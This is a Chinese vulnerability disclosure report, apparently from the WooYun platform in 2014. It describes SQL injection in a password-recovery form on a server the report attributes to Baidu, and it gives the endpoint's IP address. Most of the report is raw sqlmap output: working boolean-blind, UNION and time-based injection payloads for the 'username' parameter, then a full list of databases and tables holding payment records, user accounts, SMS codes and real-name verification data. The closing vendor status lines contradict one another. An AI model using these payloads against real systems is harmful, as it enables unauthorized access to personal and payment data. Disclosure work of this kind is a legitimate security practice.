2014-07-18: 细节已通知厂商并且等待厂商处理中 2014-07-23: 厂商已经主动忽略漏洞,细节向公众公开
百度就是快,跑起数据来也是,杠杠的,不错。
貌似登录之后才可以测试,是在找回密码处。POST:
http://111.13.96.20:80/auth/forgotpwd-two (POST)username=1
sqlmap identified the following injection points with a total of 45 HTTP(s) requests:---Place: POSTParameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=1' AND 6436=6436 AND 'thpJ'='thpJ Vector: AND [INFERENCE] Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: username=-3884' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7172766c71,0x4d68646a4a7358587675,0x716b6f6f71),NULL,NULL,NULL,NULL# Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: username=1' AND SLEEP(5) AND 'HlqX'='HlqX Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: PHP 5.2.8back-end DBMS: MySQL 5.0.11available databases [8]:[*] information_schema[*] mcp_pay[*] mcp_user[*] mysql[*] openapi[*] performance_schema[*] slow[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=1' AND 6436=6436 AND 'thpJ'='thpJ Vector: AND [INFERENCE] Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: username=-3884' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7172766c71,0x4d68646a4a7358587675,0x716b6f6f71),NULL,NULL,NULL,NULL# Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: username=1' AND SLEEP(5) AND 'HlqX'='HlqX Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: PHP 5.2.8back-end DBMS: MySQL 5.0.11Database: mcp_user[85 tables]+----------------------------------------------+| mcp_mt_log_2014-06-09 || mcp_mt_log_2014-06-10 || mcp_mt_log_2014-06-11 || mcp_mt_log_2014-06-12 || mcp_mt_log_2014-06-13 || mcp_mt_log_2014-06-14 || mcp_mt_log_2014-06-15 || mcp_mt_log_2014-06-16 || mcp_mt_log_2014-06-17 || mcp_mt_log_2014-06-18 || mcp_mt_log_2014-06-19 || mcp_mt_log_2014-06-20 || mcp_mt_log_2014-06-21 || mcp_mt_log_2014-06-22 || mcp_mt_log_2014-06-23 || mcp_mt_log_2014-06-24 || mcp_mt_log_2014-06-25 || mcp_mt_log_2014-06-26 || mcp_mt_log_2014-06-27 || mcp_mt_log_2014-06-28 || mcp_mt_log_2014-06-29 || mcp_mt_log_2014-06-30 || mcp_mt_log_2014-07-01 || mcp_mt_log_2014-07-02 || mcp_mt_log_2014-07-03 || mcp_mt_log_2014-07-04 || mcp_mt_log_2014-07-05 || mcp_mt_log_2014-07-06 || mcp_mt_log_2014-07-07 || mcp_mt_log_2014-07-08 || mcp_mt_log_2014-07-09 || mcp_mt_log_2014-07-10 || mcp_mt_log_2014-07-11 || mcp_mt_log_2014-07-12 || mcp_mt_log_2014-07-13 || mcp_mt_log_2014-07-14 || mcp_mt_log_2014-07-15 || mcp_mt_log_2014-07-16 || mcp_mt_log_2014-07-17 || mcp_mt_log_2014-07-18 || mcp_mt_log_2014-07-19 || mcp_mt_log_2014-07-20 || mcp_mt_log_2014-07-21 || mcp_mt_log_2014-07-22 || mcp_mt_log_2014-07-23 || mcp_mt_log_2014-07-24 || mcp_mt_log_2014-07-25 || mcp_mt_log_2014-07-26 || mcp_mt_log_2014-07-27 || mcp_mt_log_2014-07-28 || mcp_mt_log_2014-07-29 || mcp_mt_log_2014-07-30 || mcp_mt_log_2014-07-31 || mcp_mt_log_2014-08-01 || mcp_mt_log_2014-08-02 || mcp_auto_register || mcp_baidu_visitor || mcp_feedback_channel || mcp_feedback_type || mcp_mo_log || mcp_mt_log || mcp_sms_code || mcp_smscode_type || mcp_sys_reply || mcp_user_91 || mcp_user_baidu || mcp_user_extension || mcp_user_feedback || mcp_user_feedback_dealwith || mcp_user_fr || mcp_user_fr_type || mcp_user_info || mcp_user_log_type || mcp_user_log_typecode || mcp_user_ori || mcp_user_qudao || mcp_user_third || mcp_user_uselog || mcp_user_version || mcp_visitor_info || ricktest || user_phone_bind || user_realname_auth || user_register_type || yxjd_uid_info |+----------------------------------------------+Database: performance_schema[17 tables]+----------------------------------------------+| cond_instances || events_waits_current || events_waits_history || events_waits_history_long || events_waits_summary_by_instance || events_waits_summary_by_thread_by_event_name || events_waits_summary_global_by_event_name || file_instances || file_summary_by_event_name || file_summary_by_instance || mutex_instances || performance_timers || rwlock_instances || setup_consumers || setup_instruments || setup_timers || threads |+----------------------------------------------+Database: mcp_pay[82 tables]+----------------------------------------------+| Activity_Info || Alipay_History || Alipay_PC_History || Apexs_history || BaiFuBao_Recharge_Record || Baifubao_History || BeiWei_Mo_Info || Card_Info || Channel_Info || Channel_type || CreditCard_BindId_Phone || Duokoo_Account_Info || Exchange_Rate || External_Channel_Info || GPP_log || Game_Coorperation_Info || HuaJian_History || HuanJian_SingleBook || Kefu_Operation_Log || Kongzhong_Get_Mo || Kuaiqian_Netway_History || Kubi_Pay_Info || LianTongWo_YueDu_History || LianTong_Wo_History || Liandong_Netway_History || Mo9_Recharge_History || Pay_Channel_Info || Pay_Info || Pay_Netway_Info || Pay_Relation || Pay_Type_Info || Phone_Pay_Info || Present_Info || Present_Strategy_Info || Product_Type_Info || RDO_Recharge_History || Recharge_Card_info || Recharge_Channel_Info || Recharge_Info || Recharge_MM_Phone_Info || Recharge_NetWay_Submit_Info || Recharge_Notify_Stat || Recharge_Phone_info || Recharge_Type || ShenZhouFu_History || ShengFengyj_History || ShengFengyj_SingleBook || Singlebook_Record_Info || SouHu_Unicom_History || Sub_Channel_Info || TenPay_History || TenPay_PC_History || TianYi_Sms_History || Timing_Present_Info || Tyxk_Mo_Info || Tyxk_Send_Status || Tyxk_Subscribe_Info || Tyxk_Wap_Info || UMP_Netway_History || UMP_Netway_History_yx || UPMP_Recharge_History || User_Account_Info || User_Phone_Relation || YeePay_Credit_History || Yiao_Netway_History || Yibao_Bank_History || YidongMM_History || YidongMM_Sms_SingleBook || YidongMM_WAP_History || Youxijidi_ShortKey || Youxijidi_Wap_History || Youxijidi_Wap_History_Yx || alipay_preceate_res || hunandianxin_log || liandong_sms_recharge_yx || mcp_channel_info || mcp_cp_info || mcp_fr_info || mcp_wapgame_type || qrcode_cp_order || sinapay_log || sms_rechargeinfo_souhu |+----------------------------------------------+Database: openapi[40 tables]+----------------------------------------------+| GSDK_Alipay_History || GSDK_HuaJian_History || GSDK_ShengFeng_History || GSDK_UMP_Netway_history || GSDK_card_recharge_history || Gsdk_CreditCard_BindId_Phone || Gsdk_PalmCard_BindId_Phone || Gsdk_PayChannel_Info || Gsdk_YeePay_Credit_History || Record_ShengFeng_History_Ex || Record_Telecom_Pay_History || Record_Unicom_Pay_History || ShengFengLTYX_SMS_History || cp_game_version_info || cp_order_info || gamemsgapi_channelprefix || gsdk_order_info || gsdk_paypalm_recharge_res_record || gsdk_playgame_online_time || gsdk_yibao_recharge_history || ios_order_record || ios_order_recordbak || ios_order_recordbak0619 || qpmsg_cp_order_info || record_MMarket_history || record_fenghuangshi_history || record_fenghuangshiapidy_history || record_gamebaseh5_history || record_kjcx_history || record_ltsk_sync_history || record_mdo_history || record_mo9_history || record_tcdclt_sync_history || record_woreadermsg_history || record_woreadersdk_history || record_wostoresdk_history || record_zhongkazhihui_history || sdk_version_info || wawa_ftpfile_statics_daily || wawa_pay_history |+----------------------------------------------+Database: mysql[24 tables]+----------------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------------+Database: information_schema[65 tables]+----------------------------------------------+| CHARACTER_SETS || CLIENT_STATISTICS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_TEMPORARY_TABLES || GLOBAL_VARIABLES || INDEX_STATISTICS || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_PAGES || INNODB_BUFFER_POOL_PAGES_BLOB || INNODB_BUFFER_POOL_PAGES_INDEX || INNODB_BUFFER_POOL_STATS || INNODB_CHANGED_PAGES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_INDEX_STATS || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_RSEG || INNODB_SYS_COLUMNS || INNODB_SYS_FIELDS || INNODB_SYS_FOREIGN || INNODB_SYS_FOREIGN_COLS || INNODB_SYS_INDEXES || INNODB_SYS_STATS || INNODB_SYS_TABLES || INNODB_SYS_TABLESTATS || INNODB_TABLE_STATS || INNODB_TRX || INNODB_UNDO_LOGS || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || QUERY_RESPONSE_TIME || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TABLE_STATISTICS || TEMPORARY_TABLES || THREAD_STATISTICS || TRIGGERS || USER_PRIVILEGES || USER_STATISTICS || VIEWS || XTRADB_ADMIN_COMMAND |+----------------------------------------------+
你们懂
危害等级:无影响厂商忽略
忽略时间:2014-07-23 18:17
漏洞Rank:10 (WooYun评价)
2014-07-23:非常感谢,流动已修复
2014-07-23:非常感谢,漏洞已修复
